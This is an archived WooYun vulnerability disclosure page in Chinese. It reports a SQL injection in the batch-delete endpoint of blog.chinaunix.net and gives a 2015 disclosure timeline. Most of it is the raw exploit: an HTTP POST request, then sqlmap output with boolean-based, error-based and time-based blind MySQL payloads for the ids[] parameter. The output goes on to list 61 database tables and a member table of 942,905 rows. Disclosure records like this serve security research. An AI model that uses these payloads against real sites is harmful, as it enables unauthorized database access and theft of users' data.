乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-27: 细节已通知厂商并且等待厂商处理中 2015-06-01: 厂商已经确认,细节仅向厂商公开 2015-06-11: 细节向核心白帽子及相关领域专家公开 2015-06-21: 细节向普通白帽子公开 2015-07-01: 细节向实习白帽子公开 2015-07-16: 细节向公众公开
233
POST /blog/LogicDelBatch.html HTTP/1.1Content-Length: 154Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: blog.chinaunix.netCookie: **********************Host: blog.chinaunix.netConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36Accept: */*allsel=on&ids%5b%5d=sqlfind
---Parameter: ids[] (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: allsel=on&ids[]=a) AND 9396=9396 AND (5600=5600 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: allsel=on&ids[]=a) AND (SELECT 9889 FROM(SELECT COUNT(*),CONCAT(0x7176767a71,(SELECT (ELT(9889=9889,1))),0x717a626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1816=1816 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: allsel=on&ids[]=a) AND (SELECT * FROM (SELECT(SLEEP(5)))MReN) AND (7930=7930---[16:25:24] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.2.17back-end DBMS: MySQL 5.0Database: cublog[61 tables]+---------------------------+| tbl_album || tbl_attachments || tbl_blog || tbl_blog_draft || tbl_blog_field_1 || tbl_blog_field_10 || tbl_blog_field_11 || tbl_blog_field_12 || tbl_blog_field_13 || tbl_blog_field_14 || tbl_blog_field_16 || tbl_blog_field_17 || tbl_blog_field_18 || tbl_blog_field_2 || tbl_blog_field_20 || tbl_blog_field_21 || tbl_blog_field_22 || tbl_blog_field_24 || tbl_blog_field_25 || tbl_blog_field_26 || tbl_blog_field_27 || tbl_blog_field_28 || tbl_blog_field_29 || tbl_blog_field_3 || tbl_blog_field_30 || tbl_blog_field_4 || tbl_blog_field_5 || tbl_blog_field_6 || tbl_blog_field_8 || tbl_blog_field_9 || tbl_class || tbl_collection_links || tbl_common_config || tbl_index_del || tbl_issue || tbl_link || tbl_member || tbl_member_failedlogin || tbl_member_field || tbl_member_friend || tbl_member_group || tbl_member_notification || tbl_member_reply || tbl_member_set || tbl_member_visitor || tbl_moving_error_url || tbl_outside_articles || tbl_pic || tbl_pm_private_memberlist || tbl_pm_private_message || tbl_pm_system_message || tbl_pm_system_status || tbl_sitemap || tbl_sitemap_log || tbl_special || tbl_special_articles || tbl_spider_moving || tbl_user_sinaid || tbl_zhuanti_excels || tbl_zhuanti_keywords || uchome_space |+---------------------------+Database: cublog+------------+---------+| Table | Entries |+------------+---------+| tbl_member | 942905 |+------------+---------+
~~
危害等级:中
漏洞Rank:10
确认时间:2015-06-01 09:23
多谢帮助。
暂无